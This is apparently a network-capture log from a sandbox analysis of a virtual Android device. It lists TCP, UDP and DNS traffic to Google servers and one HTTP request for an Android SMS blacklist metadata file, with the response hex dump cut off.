Dec 21, 2017 18:02:12.997257948 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.997565985 CET49818443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:12.998737097 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.998789072 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.998795033 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.998867989 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.998874903 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.998928070 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.998934984 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.998939037 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.999144077 CET49818443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:12.999198914 CET49818443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:12.999211073 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.999274015 CET49818443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:12.999316931 CET49818443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:13.030124903 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:13.030191898 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:13.030198097 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:13.030206919 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:13.030210972 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:13.030523062 CET49818443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:13.030546904 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:13.030600071 CET49818443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:13.030646086 CET49818443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:13.030813932 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:13.030893087 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:13.031084061 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:13.031094074 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:13.031097889 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:13.031249046 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:13.031255960 CET49818443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:13.031259060 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:13.031265020 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:13.031272888 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:13.031491995 CET49818443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:13.031548023 CET49818443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:13.031589985 CET49818443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:13.031630993 CET49818443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:13.044902086 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:13.044964075 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:13.044975996 CET44340742172.217.17.138192.168.2.2
Dec 21, 2017 18:02:13.045305967 CET49818443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:13.086688995 CET40742443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:13.086730003 CET44340742172.217.17.138192.168.2.2
Dec 21, 2017 18:02:13.087073088 CET40742443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:13.362551928 CET793753192.168.2.28.8.8.8
Dec 21, 2017 18:02:13.474940062 CET5379378.8.8.8192.168.2.2
Dec 21, 2017 18:02:15.473963022 CET4343653192.168.2.28.8.8.8
Dec 21, 2017 18:02:15.571135044 CET53434368.8.8.8192.168.2.2
Dec 21, 2017 18:02:15.572036982 CET3738080192.168.2.2172.217.17.99
Dec 21, 2017 18:02:15.572081089 CET8037380172.217.17.99192.168.2.2
Dec 21, 2017 18:02:15.572360039 CET3738080192.168.2.2172.217.17.99
Dec 21, 2017 18:02:15.573096991 CET3738080192.168.2.2172.217.17.99
Dec 21, 2017 18:02:15.573124886 CET8037380172.217.17.99192.168.2.2
Dec 21, 2017 18:02:15.804744005 CET8037380172.217.17.99192.168.2.2
Dec 21, 2017 18:02:15.804780960 CET8037380172.217.17.99192.168.2.2
Dec 21, 2017 18:02:15.805805922 CET3738080192.168.2.2172.217.17.99
Dec 21, 2017 18:02:15.840337992 CET3738080192.168.2.2172.217.17.99
Dec 21, 2017 18:02:15.840387106 CET8037380172.217.17.99192.168.2.2
Dec 21, 2017 18:02:15.988349915 CET5153880192.168.2.2172.217.17.99
Dec 21, 2017 18:02:15.988398075 CET8051538172.217.17.99192.168.2.2
Dec 21, 2017 18:02:15.988848925 CET5153880192.168.2.2172.217.17.99
Dec 21, 2017 18:02:15.989315033 CET5153880192.168.2.2172.217.17.99
Dec 21, 2017 18:02:15.989331007 CET8051538172.217.17.99192.168.2.2
Dec 21, 2017 18:02:16.225672007 CET8051538172.217.17.99192.168.2.2
Dec 21, 2017 18:02:16.225723028 CET8051538172.217.17.99192.168.2.2
Dec 21, 2017 18:02:16.225732088 CET8051538172.217.17.99192.168.2.2
Dec 21, 2017 18:02:16.226871967 CET5153880192.168.2.2172.217.17.99
Dec 21, 2017 18:02:16.227401972 CET5153880192.168.2.2172.217.17.99
Dec 21, 2017 18:02:16.228260994 CET5153880192.168.2.2172.217.17.99
Dec 21, 2017 18:02:16.228832006 CET8051538172.217.17.99192.168.2.2
Dec 21, 2017 18:02:16.228916883 CET8051538172.217.17.99192.168.2.2
Dec 21, 2017 18:02:16.228925943 CET8051538172.217.17.99192.168.2.2
Dec 21, 2017 18:02:16.229796886 CET5153880192.168.2.2172.217.17.99
Dec 21, 2017 18:02:16.230854988 CET5153880192.168.2.2172.217.17.99
Dec 21, 2017 18:02:16.230942011 CET5153880192.168.2.2172.217.17.99
Dec 21, 2017 18:02:16.248480082 CET8051538172.217.17.99192.168.2.2
Dec 21, 2017 18:02:16.248522043 CET8051538172.217.17.99192.168.2.2
Dec 21, 2017 18:02:16.248529911 CET8051538172.217.17.99192.168.2.2
Dec 21, 2017 18:02:16.252479076 CET8051538172.217.17.99192.168.2.2
Dec 21, 2017 18:02:16.252521038 CET8051538172.217.17.99192.168.2.2
Dec 21, 2017 18:02:16.253482103 CET5153880192.168.2.2172.217.17.99
Dec 21, 2017 18:02:16.253576040 CET5153880192.168.2.2172.217.17.99
Dec 21, 2017 18:02:16.253654957 CET5153880192.168.2.2172.217.17.99
Dec 21, 2017 18:02:16.253673077 CET8051538172.217.17.99192.168.2.2
Dec 21, 2017 18:02:16.253803015 CET5153880192.168.2.2172.217.17.99
Dec 21, 2017 18:02:16.253882885 CET5153880192.168.2.2172.217.17.99
Dec 21, 2017 18:02:16.253957033 CET5153880192.168.2.2172.217.17.99
Dec 21, 2017 18:02:16.256344080 CET8051538172.217.17.99192.168.2.2
Dec 21, 2017 18:02:16.257364988 CET5153880192.168.2.2172.217.17.99
Dec 21, 2017 18:02:16.277899027 CET8051538172.217.17.99192.168.2.2
Dec 21, 2017 18:02:16.277942896 CET8051538172.217.17.99192.168.2.2
Dec 21, 2017 18:02:16.277992964 CET8051538172.217.17.99192.168.2.2
Dec 21, 2017 18:02:16.279218912 CET5153880192.168.2.2172.217.17.99
Dec 21, 2017 18:02:16.279907942 CET5153880192.168.2.2172.217.17.99
Dec 21, 2017 18:02:16.280529976 CET5153880192.168.2.2172.217.17.99
Dec 21, 2017 18:02:16.280569077 CET8051538172.217.17.99192.168.2.2
Dec 21, 2017 18:02:20.264338017 CET40742443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:20.264748096 CET44340742172.217.17.138192.168.2.2
Dec 21, 2017 18:02:20.266113043 CET40742443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:20.314960003 CET49818443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:20.315224886 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:20.316231966 CET49818443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:21.941541910 CET4115953192.168.2.28.8.8.8
Dec 21, 2017 18:02:22.020647049 CET53411598.8.8.8192.168.2.2
Dec 21, 2017 18:02:45.807840109 CET52265443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:45.807883024 CET44352265172.217.17.138192.168.2.2
Dec 21, 2017 18:02:45.808267117 CET52265443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:45.809901953 CET52265443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:45.810075998 CET44352265172.217.17.138192.168.2.2
Dec 21, 2017 18:02:45.996119976 CET44352265172.217.17.138192.168.2.2
Dec 21, 2017 18:02:45.997586012 CET52265443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:45.999327898 CET52265443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:45.999356985 CET44352265172.217.17.138192.168.2.2
Dec 21, 2017 18:02:46.031313896 CET52265443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:46.031341076 CET44352265172.217.17.138192.168.2.2
Dec 21, 2017 18:02:46.211724043 CET44352265172.217.17.138192.168.2.2
Dec 21, 2017 18:02:46.211747885 CET44352265172.217.17.138192.168.2.2
Dec 21, 2017 18:02:46.211755991 CET44352265172.217.17.138192.168.2.2
Dec 21, 2017 18:02:46.212045908 CET52265443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:46.230880976 CET44352265172.217.17.138192.168.2.2
Dec 21, 2017 18:02:46.230906010 CET44352265172.217.17.138192.168.2.2
Dec 21, 2017 18:02:46.231600046 CET52265443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:46.231631041 CET44352265172.217.17.138192.168.2.2
Dec 21, 2017 18:02:46.232096910 CET52265443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:46.244016886 CET44352265172.217.17.138192.168.2.2
Dec 21, 2017 18:02:46.244040966 CET44352265172.217.17.138192.168.2.2
Dec 21, 2017 18:02:46.244050026 CET44352265172.217.17.138192.168.2.2
Dec 21, 2017 18:02:46.245064020 CET52265443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:46.245095968 CET44352265172.217.17.138192.168.2.2
Dec 21, 2017 18:02:46.245116949 CET44352265172.217.17.138192.168.2.2
Dec 21, 2017 18:02:46.245237112 CET44352265172.217.17.138192.168.2.2
Dec 21, 2017 18:02:46.245246887 CET44352265172.217.17.138192.168.2.2
Dec 21, 2017 18:02:46.245467901 CET52265443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:46.245495081 CET44352265172.217.17.138192.168.2.2
Dec 21, 2017 18:02:46.245621920 CET52265443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:46.245708942 CET52265443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:46.255829096 CET44352265172.217.17.138192.168.2.2
Dec 21, 2017 18:02:46.256885052 CET44352265172.217.17.138192.168.2.2
Dec 21, 2017 18:02:46.256902933 CET44352265172.217.17.138192.168.2.2
Dec 21, 2017 18:02:46.257307053 CET52265443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:46.257333994 CET44352265172.217.17.138192.168.2.2
Dec 21, 2017 18:02:46.257922888 CET52265443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:46.264952898 CET44352265172.217.17.138192.168.2.2
Dec 21, 2017 18:02:46.265010118 CET44352265172.217.17.138192.168.2.2
Dec 21, 2017 18:02:46.265018940 CET44352265172.217.17.138192.168.2.2
Dec 21, 2017 18:02:46.265638113 CET52265443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:46.273587942 CET44352265172.217.17.138192.168.2.2
Dec 21, 2017 18:02:46.273613930 CET44352265172.217.17.138192.168.2.2
Dec 21, 2017 18:02:46.274595022 CET52265443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:46.274657965 CET44352265172.217.17.138192.168.2.2
Dec 21, 2017 18:02:46.274880886 CET44352265172.217.17.138192.168.2.2
Dec 21, 2017 18:02:46.274899960 CET44352265172.217.17.138192.168.2.2
Dec 21, 2017 18:02:46.275477886 CET52265443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:46.275501966 CET44352265172.217.17.138192.168.2.2
Dec 21, 2017 18:02:46.276134968 CET52265443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:46.276917934 CET44352265172.217.17.138192.168.2.2
Dec 21, 2017 18:02:46.276942968 CET44352265172.217.17.138192.168.2.2
Dec 21, 2017 18:02:46.277401924 CET52265443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:46.277426004 CET44352265172.217.17.138192.168.2.2
Dec 21, 2017 18:02:46.277923107 CET52265443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:46.283799887 CET44352265172.217.17.138192.168.2.2
Dec 21, 2017 18:02:46.283823967 CET44352265172.217.17.138192.168.2.2
Dec 21, 2017 18:02:46.283832073 CET44352265172.217.17.138192.168.2.2
Dec 21, 2017 18:02:46.284483910 CET52265443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:46.294826984 CET44352265172.217.17.138192.168.2.2
Dec 21, 2017 18:02:46.294847965 CET44352265172.217.17.138192.168.2.2
Dec 21, 2017 18:02:46.295325041 CET52265443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:46.295350075 CET44352265172.217.17.138192.168.2.2
Dec 21, 2017 18:02:46.296031952 CET52265443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:46.298672915 CET44352265172.217.17.138192.168.2.2
Dec 21, 2017 18:02:46.298697948 CET44352265172.217.17.138192.168.2.2
Dec 21, 2017 18:02:46.298706055 CET44352265172.217.17.138192.168.2.2
Dec 21, 2017 18:02:46.299345970 CET52265443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:46.303009987 CET44352265172.217.17.138192.168.2.2
Dec 21, 2017 18:02:46.303035021 CET44352265172.217.17.138192.168.2.2
Dec 21, 2017 18:02:46.303595066 CET52265443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:46.303620100 CET44352265172.217.17.138192.168.2.2
Dec 21, 2017 18:02:46.304256916 CET52265443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:46.312062025 CET44352265172.217.17.138192.168.2.2
Dec 21, 2017 18:02:46.359647036 CET52265443192.168.2.2172.217.17.138
Dec 21, 2017 18:04:24.057300091 CET50363443192.168.2.2172.217.17.138
Dec 21, 2017 18:04:24.057353973 CET44350363172.217.17.138192.168.2.2
Dec 21, 2017 18:04:24.058049917 CET50363443192.168.2.2172.217.17.138
Dec 21, 2017 18:04:24.060950994 CET50363443192.168.2.2172.217.17.138
Dec 21, 2017 18:04:24.061003923 CET44350363172.217.17.138192.168.2.2
Dec 21, 2017 18:04:24.389090061 CET44350363172.217.17.138192.168.2.2
Dec 21, 2017 18:04:24.389828920 CET50363443192.168.2.2172.217.17.138
Dec 21, 2017 18:04:24.391501904 CET50363443192.168.2.2172.217.17.138
Dec 21, 2017 18:04:24.391532898 CET44350363172.217.17.138192.168.2.2
Dec 21, 2017 18:04:24.393834114 CET50363443192.168.2.2172.217.17.138
Dec 21, 2017 18:04:24.393865108 CET44350363172.217.17.138192.168.2.2
Dec 21, 2017 18:04:24.649183035 CET44350363172.217.17.138192.168.2.2
Dec 21, 2017 18:04:24.649214983 CET44350363172.217.17.138192.168.2.2
Dec 21, 2017 18:04:24.649776936 CET50363443192.168.2.2172.217.17.138
Dec 21, 2017 18:04:24.675508976 CET44350363172.217.17.138192.168.2.2
Dec 21, 2017 18:04:24.675602913 CET44350363172.217.17.138192.168.2.2
Dec 21, 2017 18:04:24.675607920 CET44350363172.217.17.138192.168.2.2
Dec 21, 2017 18:04:24.676206112 CET50363443192.168.2.2172.217.17.138
Dec 21, 2017 18:04:24.680757046 CET44350363172.217.17.138192.168.2.2
Dec 21, 2017 18:04:24.680998087 CET44350363172.217.17.138192.168.2.2
Dec 21, 2017 18:04:24.681423903 CET50363443192.168.2.2172.217.17.138
Dec 21, 2017 18:04:24.681442976 CET44350363172.217.17.138192.168.2.2
Dec 21, 2017 18:04:24.682104111 CET50363443192.168.2.2172.217.17.138
Dec 21, 2017 18:04:24.682626009 CET44350363172.217.17.138192.168.2.2
Dec 21, 2017 18:04:24.683911085 CET44350363172.217.17.138192.168.2.2
Dec 21, 2017 18:04:24.683969975 CET44350363172.217.17.138192.168.2.2
Dec 21, 2017 18:04:24.684360027 CET50363443192.168.2.2172.217.17.138
Dec 21, 2017 18:04:24.684379101 CET44350363172.217.17.138192.168.2.2
Dec 21, 2017 18:04:24.685125113 CET50363443192.168.2.2172.217.17.138
Dec 21, 2017 18:04:24.685142994 CET44350363172.217.17.138192.168.2.2
Dec 21, 2017 18:04:24.686590910 CET44350363172.217.17.138192.168.2.2
Dec 21, 2017 18:04:24.686640024 CET44350363172.217.17.138192.168.2.2
Dec 21, 2017 18:04:24.687015057 CET50363443192.168.2.2172.217.17.138
Dec 21, 2017 18:04:24.687038898 CET44350363172.217.17.138192.168.2.2
Dec 21, 2017 18:04:24.687479973 CET50363443192.168.2.2172.217.17.138
Dec 21, 2017 18:04:24.687647104 CET44350363172.217.17.138192.168.2.2
Dec 21, 2017 18:04:24.690314054 CET44350363172.217.17.138192.168.2.2
Dec 21, 2017 18:04:24.690340996 CET44350363172.217.17.138192.168.2.2
Dec 21, 2017 18:04:24.691185951 CET50363443192.168.2.2172.217.17.138
Dec 21, 2017 18:04:24.691205025 CET44350363172.217.17.138192.168.2.2
Dec 21, 2017 18:04:24.691399097 CET50363443192.168.2.2172.217.17.138
Dec 21, 2017 18:04:24.694524050 CET44350363172.217.17.138192.168.2.2
Dec 21, 2017 18:04:24.694562912 CET44350363172.217.17.138192.168.2.2
Dec 21, 2017 18:04:24.694567919 CET44350363172.217.17.138192.168.2.2
Dec 21, 2017 18:04:24.694721937 CET44350363172.217.17.138192.168.2.2
Dec 21, 2017 18:04:24.694756031 CET44350363172.217.17.138192.168.2.2
Dec 21, 2017 18:04:24.695127964 CET44350363172.217.17.138192.168.2.2
Dec 21, 2017 18:04:24.695198059 CET44350363172.217.17.138192.168.2.2
Dec 21, 2017 18:04:24.695362091 CET44350363172.217.17.138192.168.2.2
Dec 21, 2017 18:04:24.697597027 CET50363443192.168.2.2172.217.17.138
Dec 21, 2017 18:04:24.697658062 CET50363443192.168.2.2172.217.17.138
Dec 21, 2017 18:04:24.697670937 CET44350363172.217.17.138192.168.2.2
Dec 21, 2017 18:04:24.697765112 CET50363443192.168.2.2172.217.17.138
Dec 21, 2017 18:04:24.697869062 CET44350363172.217.17.138192.168.2.2
Dec 21, 2017 18:04:24.697896957 CET44350363172.217.17.138192.168.2.2
Dec 21, 2017 18:04:24.698107004 CET50363443192.168.2.2172.217.17.138
Dec 21, 2017 18:04:24.698165894 CET50363443192.168.2.2172.217.17.138
Dec 21, 2017 18:04:24.698178053 CET44350363172.217.17.138192.168.2.2
Dec 21, 2017 18:04:24.698751926 CET50363443192.168.2.2172.217.17.138
Dec 21, 2017 18:04:24.705661058 CET44350363172.217.17.138192.168.2.2
Dec 21, 2017 18:04:24.711215019 CET44350363172.217.17.138192.168.2.2
Dec 21, 2017 18:04:24.711272955 CET44350363172.217.17.138192.168.2.2
Dec 21, 2017 18:04:24.711517096 CET50363443192.168.2.2172.217.17.138
Dec 21, 2017 18:04:24.711540937 CET44350363172.217.17.138192.168.2.2
Dec 21, 2017 18:04:24.712095976 CET50363443192.168.2.2172.217.17.138
Dec 21, 2017 18:04:24.718080044 CET44350363172.217.17.138192.168.2.2
Dec 21, 2017 18:04:24.730664968 CET44350363172.217.17.138192.168.2.2
Dec 21, 2017 18:04:24.730982065 CET50363443192.168.2.2172.217.17.138
Dec 21, 2017 18:04:24.731004000 CET44350363172.217.17.138192.168.2.2
Dec 21, 2017 18:04:24.771265030 CET50363443192.168.2.2172.217.17.138
Dec 21, 2017 18:04:24.779834032 CET44350363172.217.17.138192.168.2.2
Dec 21, 2017 18:04:24.780272961 CET50363443192.168.2.2172.217.17.138
Dec 21, 2017 18:04:24.781325102 CET44350363172.217.17.138192.168.2.2
Dec 21, 2017 18:04:24.781352997 CET44350363172.217.17.138192.168.2.2
Dec 21, 2017 18:04:24.781357050 CET44350363172.217.17.138192.168.2.2
Dec 21, 2017 18:04:24.781819105 CET50363443192.168.2.2172.217.17.138
Dec 21, 2017 18:04:24.781980038 CET50363443192.168.2.2172.217.17.138
Dec 21, 2017 18:04:24.782043934 CET50363443192.168.2.2172.217.17.138
Dec 21, 2017 18:04:24.782056093 CET44350363172.217.17.138192.168.2.2
Dec 21, 2017 18:04:24.782399893 CET50363443192.168.2.2172.217.17.138
Dec 21, 2017 18:04:24.793647051 CET1531953192.168.2.28.8.8.8
Dec 21, 2017 18:04:24.798067093 CET44350363172.217.17.138192.168.2.2
Dec 21, 2017 18:04:24.798088074 CET44350363172.217.17.138192.168.2.2
Dec 21, 2017 18:04:24.798091888 CET44350363172.217.17.138192.168.2.2
Dec 21, 2017 18:04:24.798496962 CET50363443192.168.2.2172.217.17.138
Dec 21, 2017 18:04:24.798543930 CET50363443192.168.2.2172.217.17.138
Dec 21, 2017 18:04:24.798588037 CET50363443192.168.2.2172.217.17.138
Dec 21, 2017 18:04:24.822208881 CET44350363172.217.17.138192.168.2.2
Dec 21, 2017 18:04:24.822242975 CET44350363172.217.17.138192.168.2.2
Dec 21, 2017 18:04:24.822592974 CET50363443192.168.2.2172.217.17.138
Dec 21, 2017 18:04:24.822680950 CET50363443192.168.2.2172.217.17.138
Dec 21, 2017 18:04:24.879168034 CET53153198.8.8.8192.168.2.2
Dec 21, 2017 18:04:24.880276918 CET52263443192.168.2.2172.217.20.74
Dec 21, 2017 18:04:24.880300999 CET44352263172.217.20.74192.168.2.2
Dec 21, 2017 18:04:24.880870104 CET52263443192.168.2.2172.217.20.74
Dec 21, 2017 18:04:24.883640051 CET52263443192.168.2.2172.217.20.74
Dec 21, 2017 18:04:24.883656979 CET44352263172.217.20.74192.168.2.2
Dec 21, 2017 18:04:25.064523935 CET44352263172.217.20.74192.168.2.2
Dec 21, 2017 18:04:25.064611912 CET44352263172.217.20.74192.168.2.2
Dec 21, 2017 18:04:25.065351009 CET52263443192.168.2.2172.217.20.74
Dec 21, 2017 18:04:25.065543890 CET52263443192.168.2.2172.217.20.74
Dec 21, 2017 18:04:25.089828014 CET44352263172.217.20.74192.168.2.2
Dec 21, 2017 18:04:25.090651035 CET52263443192.168.2.2172.217.20.74
Dec 21, 2017 18:04:25.125730991 CET52263443192.168.2.2172.217.20.74
Dec 21, 2017 18:04:25.125760078 CET44352263172.217.20.74192.168.2.2
Dec 21, 2017 18:04:25.286109924 CET44352263172.217.20.74192.168.2.2
Dec 21, 2017 18:04:25.314152002 CET52263443192.168.2.2172.217.20.74
Dec 21, 2017 18:04:25.314187050 CET44352263172.217.20.74192.168.2.2
Dec 21, 2017 18:04:25.598639011 CET44352263172.217.20.74192.168.2.2
Dec 21, 2017 18:04:25.638863087 CET52263443192.168.2.2172.217.20.74
Dec 21, 2017 18:04:25.645368099 CET52263443192.168.2.2172.217.20.74
Dec 21, 2017 18:04:25.645400047 CET44352263172.217.20.74192.168.2.2
Dec 21, 2017 18:04:25.908416986 CET44352263172.217.20.74192.168.2.2
Dec 21, 2017 18:04:25.909244061 CET52263443192.168.2.2172.217.20.74
Dec 21, 2017 18:04:25.938647032 CET52263443192.168.2.2172.217.20.74
Dec 21, 2017 18:04:25.938678980 CET44352263172.217.20.74192.168.2.2
Dec 21, 2017 18:04:26.414583921 CET44352263172.217.20.74192.168.2.2
Dec 21, 2017 18:04:26.442039967 CET52263443192.168.2.2172.217.20.74
Dec 21, 2017 18:04:26.442210913 CET44352263172.217.20.74192.168.2.2
Dec 21, 2017 18:04:26.648780107 CET44352263172.217.20.74192.168.2.2
Dec 21, 2017 18:04:26.675071955 CET52263443192.168.2.2172.217.20.74
Dec 21, 2017 18:04:26.675103903 CET44352263172.217.20.74192.168.2.2
Dec 21, 2017 18:04:26.964972019 CET44352263172.217.20.74192.168.2.2
Dec 21, 2017 18:04:26.989686012 CET52263443192.168.2.2172.217.20.74
Dec 21, 2017 18:04:26.989871025 CET44352263172.217.20.74192.168.2.2
Dec 21, 2017 18:04:27.216806889 CET44352263172.217.20.74192.168.2.2
Dec 21, 2017 18:04:27.247193098 CET52263443192.168.2.2172.217.20.74
Dec 21, 2017 18:04:27.247340918 CET44352263172.217.20.74192.168.2.2
Dec 21, 2017 18:04:27.421281099 CET44352263172.217.20.74192.168.2.2
Dec 21, 2017 18:04:27.448168039 CET52263443192.168.2.2172.217.20.74
Dec 21, 2017 18:04:27.448218107 CET44352263172.217.20.74192.168.2.2
Dec 21, 2017 18:04:27.449379921 CET52263443192.168.2.2172.217.20.74
Dec 21, 2017 18:04:27.449409008 CET44352263172.217.20.74192.168.2.2
Dec 21, 2017 18:04:27.450989008 CET52263443192.168.2.2172.217.20.74
Dec 21, 2017 18:04:27.451018095 CET44352263172.217.20.74192.168.2.2
Dec 21, 2017 18:04:27.452339888 CET52263443192.168.2.2172.217.20.74
Dec 21, 2017 18:04:27.452368021 CET44352263172.217.20.74192.168.2.2
Dec 21, 2017 18:04:27.453777075 CET52263443192.168.2.2172.217.20.74
Dec 21, 2017 18:04:27.453804016 CET44352263172.217.20.74192.168.2.2
Dec 21, 2017 18:04:27.455125093 CET52263443192.168.2.2172.217.20.74
Dec 21, 2017 18:04:27.455152035 CET44352263172.217.20.74192.168.2.2
Dec 21, 2017 18:04:27.814323902 CET44352263172.217.20.74192.168.2.2
Dec 21, 2017 18:04:27.833448887 CET52263443192.168.2.2172.217.20.74
Dec 21, 2017 18:04:27.833578110 CET44352263172.217.20.74192.168.2.2
Dec 21, 2017 18:04:28.045574903 CET44352263172.217.20.74192.168.2.2
Dec 21, 2017 18:04:28.086519003 CET52263443192.168.2.2172.217.20.74

UDP Packets

TimestampSource PortDest PortSource IPDest IP
Dec 21, 2017 18:02:13.362551928 CET793753192.168.2.28.8.8.8
Dec 21, 2017 18:02:13.474940062 CET5379378.8.8.8192.168.2.2
Dec 21, 2017 18:02:15.473963022 CET4343653192.168.2.28.8.8.8
Dec 21, 2017 18:02:15.571135044 CET53434368.8.8.8192.168.2.2
Dec 21, 2017 18:02:21.941541910 CET4115953192.168.2.28.8.8.8
Dec 21, 2017 18:02:22.020647049 CET53411598.8.8.8192.168.2.2
Dec 21, 2017 18:04:24.793647051 CET1531953192.168.2.28.8.8.8
Dec 21, 2017 18:04:24.879168034 CET53153198.8.8.8192.168.2.2

DNS Queries

TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
Dec 21, 2017 18:02:15.473963022 CET192.168.2.28.8.8.80xe03fStandard query (0)www.gstatic.comA (IP address)IN (0x0001)
Dec 21, 2017 18:04:24.793647051 CET192.168.2.28.8.8.80x52c6Standard query (0)play.googleapis.comA (IP address)IN (0x0001)

DNS Answers

TimestampSource IPDest IPTrans IDReplay CodeNameCNameAddressTypeClass
Dec 21, 2017 18:02:15.571135044 CET8.8.8.8192.168.2.20xe03fNo error (0)www.gstatic.com172.217.17.99A (IP address)IN (0x0001)
Dec 21, 2017 18:04:24.879168034 CET8.8.8.8192.168.2.20x52c6No error (0)play.googleapis.com172.217.20.74A (IP address)IN (0x0001)

HTTP Request Dependency Graph

  • www.gstatic.com

HTTP Packets

TimestampSource PortDest PortSource IPDest IPHeaderTotal Bytes Transfered (KB)
Dec 21, 2017 18:02:15.573096991 CET3738080192.168.2.2172.217.17.99GET /android/config_update/08312017-sms-blacklist.metadata.txt HTTP/1.1
User-Agent: AndroidDownloadManager/5.1.1 (Linux; U; Android 5.1.1; VirtualBox Build/LMY48W)
Accept-Encoding: identity
Connection: close
Host: www.gstatic.com
195
Dec 21, 2017 18:02:15.804744005 CET8037380172.217.17.99192.168.2.2HTTP/1.1 200 OK
Accept-Ranges: none
Vary: Accept-Encoding
Content-Type: text/plain
Date: Mon, 18 Dec 2017 18:26:47 GMT
Expires: Tue, 26 Dec 2017 18:26:47 GMT
Last-Modified: Fri, 08 Sep 2017 01:15:00 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=691200
Age: 254128
Connection: close
Data Raw: 53 49 47 4e 41 54 55 52 45 3a 67 6a 6c 42 65 46 6f 33 49 35 51 42 74 4f 50 62 53 67 63 55 45 61 5a 51 56 31 6f 62 54 30 34 48 62 33 64 35 32 32 50 35 6d 48 77 35 76 42 70 42 38 75 38 56 64 6c 31 37 59 63 53 6a 63 37 32 6d 58 6f 72 67 76 6a 62 51 4d 79 59 61 71 41 43 64 43 63 34 4a 42 68 33 62 70 2f 6f 6f 66 37 4e 68 6d 6d 61 64 39 7a 47 55 37 6e 2b 61 56 59 63 65 46 4d 35 66 2f 41 31 6e 7a 44 68 6f 32 55 5a 37 52 50 77 75 52 70 63 52 30 6d 52 55 2b 78 52 47 6b 4a 33 69 54 6c 6b 6e 49 38 30 52 4f 34 49 43 30 63 48 51 4a 79 70 39 2f 32 2b 4f 2f 35 71 43 5a 64 46 43 6c 39 7a 61 56 64 63 34 65 36 59 55 39 53 51 58 4a 2f 71 6e 44 45 6c 37 54 38 4c 58 49 45 52 31 35 30 62 4f 63 34 43 6f 55 54 65 61 47 6f 74 55 65 67 37 6f 78 5a 76 62 6e 50 4c 54 32 6a 72 71 75 68 38 46 68 62 75 6f 52 4f 44 66 7a 66 4a 2f 34 31 49 75 30 33 41 32 50 4e 68 32 49 74 35 67 31 64 6b 62 71 79 74 4e 39 6f 43 61 49 62 53 2b 56 5a 75 30 67 48 71 75 38 75 79 39 4e 70 47 39 55 30 69 6a 2f 62 2b 65 49 4d 73 